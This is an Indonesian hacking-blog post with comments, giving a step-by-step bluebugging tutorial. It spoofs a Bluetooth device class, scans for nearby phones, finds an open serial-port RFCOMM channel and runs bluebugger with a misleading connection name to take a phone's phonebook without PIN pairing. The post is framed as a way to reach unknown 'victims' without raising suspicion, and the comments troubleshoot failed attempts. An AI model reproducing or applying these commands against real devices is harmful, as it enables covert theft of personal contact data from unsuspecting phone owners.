Bypass And Analysis Phone Bluetooth [PART 2]

Salam sahabat exploit =))
Berbeda dari postingan-postingan saya sebelumnya mengenai pengeksploitasian terhadap sistem operasi, pada postingan kali ini saya mencoba menganalisis sebuah Telepon Genggam yang secara umum di kenal dengan nama Hand Phone (HP)

cara ini saya bagi menjadii dua kategory, yaitu :

1. Configure Bluetooth Wizard  (No Technic = DAMN)
Menghubungkan Sistim Operasi kita dengan Telepon Genggam yang menjadi target kita melalui bluetooth. kemudian mengatur settingan yg ada pada Bluetooth Wizard, kelihatannya sangat gampang bukan..?? namun ada satu hal yang pasti terlewatkan yaitu nomor PIN sebagai code persetujuan antara Bluetooth target dengan bluetooth yang ada pada sistem operasi kita,ini akan menimbulkan kecurigaan dan saya yakin korban pun tidaklah terlalu bodoh untuk melakukan hal ini, akan tetapi ini akan terlihat mudah jika korban kita adalah mereka yang kita kenali, kita hanya meminta korban untuk mengetikkan PIN tersebut, kemudian sistem operasi dan telepon genggam telah terhubung.



Q : Lalu bagai mana target kita adalah mereka yang tidak kita kenali,? dan tidak menimbulkan kecurigaan terhadap korban. mustahil sistem operasi kita akan terhubung dengan bluetooth korban, ini sangat di luar nalar bukan ???

A : Disini lah letak kecerdasan seorang Attacker, dengan memanfaatkan tool-tool yang ada serta teknik dan pengalaman-pengalamannya ia akan membuat menjadi lebih sederhana, bahkan kaum awam pun tidak sanggup mencerna dengan akal sehat.

2. Through the serial port to configure bluetooth =))

Equipments :
1. Hciconfig
2. Hcitool
3. Sdptool
4. Rfcomm 
5. Bluebugger
6. Wammu

pada Operating System yang saya gunakan ( Kali Linux 1.5 )secara umum equipment 1-4 telah terinstall.

Download Bluebugger :
http://www.mobile-download.net/Soft/Soft_5242.htm

Install Wammu :
# apt-get install wammu

First Step :

mengaktifkan hci0 perangkap bluetooth.
hciconfig hci0 up


selanjutnya kita cek class device untuk hci0 :
# hciconfig hci0 class

terlihat pada gambar diatas nilai Class masih menggunakan nilai dari default,
selanjutnya saya mengubah nilai class menjadi : 0x050204 
 :
hciconfig hci0 class 0x050204

0x050204 : saya mengatur class device menjadi "050204"



Kemudian saya mengecek class device bluetooth yang ada dapa sistem operasi yang saya gunakan :
hciconfig -a

maka hasil output terlihat menjadi seperti ini :

Tahap selanjutnya melakukan percarian terhadap device Bluetooth yang aktif :
hcitool scan


Ada beberapa perangkat bluetooth yang terekam, namun agar tidak ada pihak yang merasa di rugikan dalam analisis yg saya lakukan maka saya mengambil target saya 00:BD:3A:CD:B9:48 itu adalah perangkat bluetooth yang ada pada Telepon Genggam saya.

lanjut ke tahap berikutnya :
sdptool browse 00:BD:3A:CD:B9:48

Browse = Browse all available services
00:BD:3A:CD:B9:48 = Mac yang menjadi target saya

NOTE : ada banyak service name yg terdeksi, namun yang kita ambil hanya service name yg memili Serial Port :)


perhatikan bagian yg saya blok, terlihat memiliki Serial Port dan RFCOMM serta channel 15 kemungkinan besar pengujian ini berhasil =))

selanjutnya kita mengatur perangkat bluetooth transfer protolkol :
rfcomm bind rfcomm0 00:BD:3A:CD:B9:48


selanjutnya menjalankan service bluetooth:
# /etc/init.d/bluetooth start


selanjutnya kita melakukan connection terhadap bluetooth korban :
# ./bluebugger -m "Please Enter [H2] To Accept" -c 15 -a 00:BD:3A:CD:B9:48  phonebook

-mName to use when connecting
-c = Channel to use (channel 15 perhatikan channel yg ada pada gambar diatas sebelumnya)
-aBluetooth address of target


DONE =))
sekarang kita sistem operasi yang saya gunakan telah terhubung dengat Telepon Genggam korban.

selanjutnya kita memanfaatkan Wammu tools (Mobile Phone manager)



selanjutnya untuk configurasi anda bisa lihat pada postingan saya sebelumnya http://h2-exploitation.blogspot.com/2013/09/configuration-wammu-connection-bluetooth.html


Regards:
Hidemichi-Hiroyuki a.k.a [H2]

Comments

  1. Referensi buat yang gak bisa Compile Bluea install ini :

    sudo apt-get install bluez-utils bluez-compat bluez-hcidump checkinstall libusb-dev libbluetooth-dev joystick

    ReplyDelete
  2. Kalau hasilnya begini bagaimana?

    root@Sector1337:/home/bugtraq/Unduhan/bluebugger-0.1# ./bluebugger -m "Message" -c 4 -a 00:24:7D:9C:E1:5C phonebook

    bluebugger 0.1 ( MaJoMu | www.codito.de )
    -----------------------------------------

    Target Device: '00:24:7D:9C:E1:5C'
    Target Name: 'Nonmae'

    Cannot open '/dev/rfcomm0': Connection refused
    root@Sector1337:/home/bugtraq/Unduhan/bluebugger-0.1#

    ReplyDelete
  3. coba di perhatikan channell-nya kemudian serial portnya kebuka atau tidak.
    pilih service yang memiliki serial port yang terbuka kemudian lihat pada channel berapa.?
    perhatikan lagi pada gambar yang saya blok diatas :)

    ReplyDelete

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

Exploit Samba "SmbClient"

Configure Pure-FTP on Kali Linux